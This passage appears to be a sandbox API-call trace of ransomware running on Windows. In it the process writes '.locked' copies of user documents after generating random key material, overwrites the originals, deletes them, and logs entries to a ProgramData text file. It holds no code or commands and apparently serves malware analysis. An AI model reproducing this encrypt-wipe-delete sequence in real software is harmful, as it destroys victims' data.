(lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\wpUR.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\wpur.mp4")) returned 1 [0276.401] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0276.881] SetEvent (hEvent=0x1b8) returned 1 [0276.881] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0277.174] SetEvent (hEvent=0x1ac) returned 1 [0277.174] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0277.248] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0277.248] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0277.264] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0277.264] SetEvent (hEvent=0x184) returned 1 [0277.264] SetEvent (hEvent=0x104) returned 1 [0277.264] SetEvent (hEvent=0x14c) returned 1 [0277.264] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0277.317] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb34, ulCount=0x10, ulNumEntriesRemoved=0x33bafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb34, ulNumEntriesRemoved=0x33bafb14) returned 0 [0277.317] SetEvent (hEvent=0x150) returned 1 [0277.317] SetEvent (hEvent=0x184) returned 1 [0277.317] SetEvent (hEvent=0x104) returned 1 [0277.317] SetEvent (hEvent=0x14c) returned 1 [0277.323] ReadFile (in: hFile=0x1c8, lpBuffer=0x13fa2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276dd68, lpOverlapped=0x0 | out: lpBuffer=0x13fa2000*, lpNumberOfBytesRead=0x1276dd68*=0x10e0, lpOverlapped=0x0) returned 1 [0277.326] WriteFile (in: hFile=0x1c0, lpBuffer=0x13fa2000*, nNumberOfBytesToWrite=0x10e0, lpNumberOfBytesWritten=0x1276dd74, lpOverlapped=0x0 | out: lpBuffer=0x13fa2000*, lpNumberOfBytesWritten=0x1276dd74*=0x10e0, lpOverlapped=0x0) returned 1 [0277.537] ReadFile (in: hFile=0x1c8, lpBuffer=0x13fa2000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1276dd68, lpOverlapped=0x0 | out: lpBuffer=0x13fa2000*, lpNumberOfBytesRead=0x1276dd68*=0x0, lpOverlapped=0x0) returned 1 [0277.537] CloseHandle (hObject=0x1c0) returned 1 [0277.538] CloseHandle (hObject=0x1c8) returned 1 [0277.538] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0277.538] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1276de94 | out: lpMode=0x1276de94) returned 0 [0277.538] WriteFile (in: hFile=0x1c8, lpBuffer=0x1234a200*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x1276de64, lpOverlapped=0x0 | out: lpBuffer=0x1234a200*, lpNumberOfBytesWritten=0x1276de64*=0x37, lpOverlapped=0x0) returned 1 [0277.538] CloseHandle (hObject=0x1c8) returned 1 [0277.539] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\o7c4LDm2F7lcu2v.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\o7c4ldm2f7lcu2v.wav")) returned 1 [0277.631] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0277.631] SetEvent (hEvent=0x14c) returned 1 [0277.631] SetEvent (hEvent=0x104) returned 1 [0277.666] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\o7c4LDm2F7lcu2v.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\o7c4ldm2f7lcu2v.wav"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0277.847] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0278.045] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1276de88 | out: lpMode=0x1276de88) returned 0 [0278.045] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0278.580] WriteFile (in: hFile=0x1b0, lpBuffer=0x16fbe000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276de78, lpOverlapped=0x0 | out: lpBuffer=0x16fbe000*, lpNumberOfBytesWritten=0x1276de78*=0xfa000, lpOverlapped=0x0) returned 1 [0278.628] CloseHandle (hObject=0x1b0) returned 1 [0278.685] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\o7c4LDm2F7lcu2v.wav" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\o7c4ldm2f7lcu2v.wav")) returned 1 [0278.975] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0279.196] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0279.309] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0279.373] SetEvent (hEvent=0x104) returned 1 [0279.373] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0279.598] WriteFile (in: hFile=0x188, lpBuffer=0x12352280*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x1249ce64, lpOverlapped=0x0 | out: lpBuffer=0x12352280*, lpNumberOfBytesWritten=0x1249ce64*=0x44, lpOverlapped=0x0) returned 1 [0279.598] CloseHandle (hObject=0x188) returned 1 [0279.599] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\C5Fa.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\c5fa.mkv")) returned 1 [0280.167] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0280.441] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0280.467] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0280.467] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0280.468] SetEvent (hEvent=0x150) returned 1 [0280.468] SetEvent (hEvent=0x21c) returned 1 [0280.468] SetEvent (hEvent=0x184) returned 1 [0280.468] SetEvent (hEvent=0x1ac) returned 1 [0280.468] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0280.485] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0280.485] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0280.514] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0280.514] SetEvent (hEvent=0x214) returned 1 [0280.514] SetEvent (hEvent=0x198) returned 1 [0280.514] SetEvent (hEvent=0x1ac) returned 1 [0280.514] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0280.552] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb34, ulCount=0x10, ulNumEntriesRemoved=0x33bafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb34, ulNumEntriesRemoved=0x33bafb14) returned 0 [0280.552] SetEvent (hEvent=0x150) returned 1 [0280.552] SetEvent (hEvent=0x1ac) returned 1 [0280.552] SetEvent (hEvent=0x198) returned 1 [0280.594] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\C5Fa.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\c5fa.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0280.911] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0282.527] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x1265de88 | out: lpMode=0x1265de88) returned 0 [0282.527] WriteFile (in: hFile=0x1bc, lpBuffer=0x168ee000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1265de78, lpOverlapped=0x0 | out: lpBuffer=0x168ee000*, lpNumberOfBytesWritten=0x1265de78*=0xfa000, lpOverlapped=0x0) returned 1 [0282.649] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0283.509] SetEvent (hEvent=0x150) returned 1 [0283.509] CloseHandle (hObject=0x1bc) returned 1 [0283.551] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0283.799] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0283.885] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0283.939] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0283.939] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x1276ae94 | out: lpMode=0x1276ae94) returned 0 [0283.939] WriteFile (in: hFile=0x188, lpBuffer=0x125ec0f0*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x1276ae64, lpOverlapped=0x0 | out: lpBuffer=0x125ec0f0*, lpNumberOfBytesWritten=0x1276ae64*=0x42, lpOverlapped=0x0) returned 1 [0283.940] CloseHandle (hObject=0x188) returned 1 [0283.941] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\bHSVytOE\\zMPTOdNQ.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\bhsvytoe\\zmptodnq.jpg")) returned 1 [0284.393] SetEvent (hEvent=0x198) returned 1 [0284.393] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0285.389] SetEvent (hEvent=0x20c) returned 1 [0285.389] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0285.714] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\7pK8Q9_TXKB_8t_99Nak.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\7pk8q9_txkb_8t_99nak.gif")) returned 1 [0285.877] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0285.978] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12657a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12657a24*=0xb) returned 1 [0285.981] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\4hjR_qw1PrF.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4hjr_qw1prf.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0285.981] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0285.981] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\4hjR_qw1PrF.docx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4hjr_qw1prf.docx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0285.982] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x12657d9c | out: lpMode=0x12657d9c) returned 0 [0285.982] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc020 | out: pbBuffer=0x125fc020) returned 1 [0285.983] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8060 | out: pbBuffer=0x124a8060) returned 1 [0285.983] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c281 | out: pbBuffer=0x1237c281) returned 1 [0285.983] WriteFile (in: hFile=0x1e0, lpBuffer=0x12695000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12657d78, lpOverlapped=0x0 | out: lpBuffer=0x12695000*, lpNumberOfBytesWritten=0x12657d78*=0x80, lpOverlapped=0x0) returned 1 [0285.986] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0286.068] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0286.068] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0286.068] SetEvent (hEvent=0x150) returned 1 [0286.068] SetEvent (hEvent=0x22c) returned 1 [0286.068] SetEvent (hEvent=0x1d0) returned 1 [0286.068] ReadFile (in: hFile=0x230, lpBuffer=0x154b8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x154b8000*, lpNumberOfBytesRead=0x12657d68*=0x273d, lpOverlapped=0x0) returned 1 [0286.070] WriteFile (in: hFile=0x1e0, lpBuffer=0x154b8000*, nNumberOfBytesToWrite=0x273d, lpNumberOfBytesWritten=0x12657d74, lpOverlapped=0x0 | out: lpBuffer=0x154b8000*, lpNumberOfBytesWritten=0x12657d74*=0x273d, lpOverlapped=0x0) returned 1 [0286.455] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0286.569] SetEvent (hEvent=0x20c) returned 1 [0286.569] ReadFile (in: hFile=0x230, lpBuffer=0x154b8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12657d68, lpOverlapped=0x0 | out: lpBuffer=0x154b8000*, lpNumberOfBytesRead=0x12657d68*=0x0, lpOverlapped=0x0) returned 1 [0286.570] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0287.005] CloseHandle (hObject=0x1e0) returned 1 [0287.006] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0287.729] CloseHandle (hObject=0x230) returned 1 [0287.729] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0287.730] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x12657e94 | out: lpMode=0x12657e94) returned 0 [0287.730] WriteFile (in: hFile=0x230, lpBuffer=0x1264a140*, nNumberOfBytesToWrite=0x36, lpNumberOfBytesWritten=0x12657e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a140*, lpNumberOfBytesWritten=0x12657e64*=0x36, lpOverlapped=0x0) returned 1 [0287.730] CloseHandle (hObject=0x230) returned 1 [0287.732] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\4hjR_qw1PrF.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4hjr_qw1prf.docx")) returned 1 [0287.833] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.113] SetEvent (hEvent=0x190) returned 1 [0288.113] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.268] SetEvent (hEvent=0x190) returned 1 [0288.268] SwitchToThread () returned 1 [0288.408] SetEvent (hEvent=0x190) returned 1 [0288.408] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.412] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.513] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.557] SetEvent (hEvent=0x104) returned 1 [0288.557] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0288.616] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.616] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0288.653] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.653] SetEvent (hEvent=0x134) returned 1 [0288.653] SetEvent (hEvent=0x104) returned 1 [0288.653] SetEvent (hEvent=0x12c) returned 1 [0288.653] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.700] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb34, ulCount=0x10, ulNumEntriesRemoved=0x33bafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb34, ulNumEntriesRemoved=0x33bafb14) returned 0 [0288.700] SetEvent (hEvent=0x150) returned 1 [0288.700] SetEvent (hEvent=0x12c) returned 1 [0288.703] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0288.729] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.729] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0288.729] SetEvent (hEvent=0x12c) returned 1 [0288.731] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0288.773] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.773] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0288.781] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.781] SetEvent (hEvent=0x104) returned 1 [0288.781] SetEvent (hEvent=0x12c) returned 1 [0288.781] SetEvent (hEvent=0x134) returned 1 [0288.781] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.811] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb34, ulCount=0x10, ulNumEntriesRemoved=0x33bafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb34, ulNumEntriesRemoved=0x33bafb14) returned 0 [0288.811] SetEvent (hEvent=0x150) returned 1 [0288.811] SetEvent (hEvent=0x134) returned 1 [0288.811] SetEvent (hEvent=0x12c) returned 1 [0288.838] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0288.846] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.847] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0288.847] SetEvent (hEvent=0x12c) returned 1 [0288.847] SetEvent (hEvent=0x134) returned 1 [0288.847] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0288.876] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.877] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\Crvhk0MgLr2QKx _m.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\crvhk0mglr2qkx _m.pdf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0288.877] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x124a1d9c | out: lpMode=0x124a1d9c) returned 0 [0288.878] SetEvent (hEvent=0x20c) returned 1 [0288.878] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0288.977] SetEvent (hEvent=0x12c) returned 1 [0288.977] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0289.015] WriteFile (in: hFile=0x180, lpBuffer=0x1264a040*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x1235fe64, lpOverlapped=0x0 | out: lpBuffer=0x1264a040*, lpNumberOfBytesWritten=0x1235fe64*=0x31, lpOverlapped=0x0) returned 1 [0289.015] CloseHandle (hObject=0x180) returned 1 [0289.016] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\CX3dvz.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\cx3dvz.pptx")) returned 1 [0289.094] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0290.133] SetEvent (hEvent=0x134) returned 1 [0290.133] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0290.170] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0290.208] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0290.234] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0290.234] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0290.234] SetEvent (hEvent=0x150) returned 1 [0290.234] SetEvent (hEvent=0x190) returned 1 [0290.234] SetEvent (hEvent=0x104) returned 1 [0290.234] SetEvent (hEvent=0x20c) returned 1 [0290.238] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0290.371] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0290.371] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0290.410] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0290.410] SetEvent (hEvent=0x12c) returned 1 [0290.410] SetEvent (hEvent=0x20c) returned 1 [0290.410] SetEvent (hEvent=0x1b8) returned 1 [0290.410] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0290.478] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb34, ulCount=0x10, ulNumEntriesRemoved=0x33bafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb34, ulNumEntriesRemoved=0x33bafb14) returned 0 [0290.478] SetEvent (hEvent=0x150) returned 1 [0290.478] SetEvent (hEvent=0x20c) returned 1 [0290.478] SetEvent (hEvent=0x1b8) returned 1 [0290.478] SetEvent (hEvent=0x12c) returned 1 [0290.496] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0290.530] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0290.530] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb30, ulCount=0x10, ulNumEntriesRemoved=0x33bafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb30, ulNumEntriesRemoved=0x33bafb10) returned 0 [0290.530] SetEvent (hEvent=0x1b8) returned 1 [0290.530] SetEvent (hEvent=0x12c) returned 1 [0290.530] SetEvent (hEvent=0x20c) returned 1 [0290.532] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0290.575] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0290.577] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0x1) returned 0x102 [0290.627] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0290.627] SetEvent (hEvent=0x104) returned 1 [0290.627] SetEvent (hEvent=0x20c) returned 1 [0290.627] SetEvent (hEvent=0x1b8) returned 1 [0290.627] WaitForSingleObject (hHandle=0x1dc, dwMilliseconds=0xffffffff) returned 0x0 [0290.679] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33bafb34, ulCount=0x10, ulNumEntriesRemoved=0x33bafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33bafb34, ulNumEntriesRemoved=0x33bafb14) returned 0 [0290.679] SetEvent (hEvent=0x150) returned 1 [0290.679] SetEvent (hEvent=0x1b8) returned 1 [0290.679] SetEvent (hEvent=0x20c) returned 1 [0290.680] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\4hjR_qw1PrF.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4hjr_qw1prf.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0290.841] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x12625e88 | out: lpMode=0x12625e88) returned 0 [0290.841] WriteFile (in: hFile=0x1bc, lpBuffer=0x12ab6000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12625e78, lpOverlapped=0x0 | out: lpBuffer=0x12ab6000*, lpNumberOfBytesWritten=0x12625e78*=0xfa000, lpOverlapped=0x0) returned 1 [0292.788] CloseHandle (hObject=0x1bc) returned 1 [0292.824] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\4hjR_qw1PrF.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4hjr_qw1prf.docx")) returned 1 [0292.877] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12625a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x12625a24*=0xb) returned 1 [0292.916] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\PksQcVAF-FVG.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pksqcvaf-fvg.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0292.916] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12625d9c | out: lpMode=0x12625d9c) returned 0 [0292.916] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\PksQcVAF-FVG.docx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\pksqcvaf-fvg.docx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0292.916] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x12625d9c | out: lpMode=0x12625d9c) returned 0 [0292.917] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c220 | out: pbBuffer=0x1234c220) returned 1 [0292.917] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766050 | out: pbBuffer=0x12766050) returned 1 [0292.917] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c181 | out: pbBuffer=0x1237c181) returned 1 [0292.917] WriteFile (in: hFile=0x218, lpBuffer=0x1266f000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12625d78, lpOverlapped=0x0 | 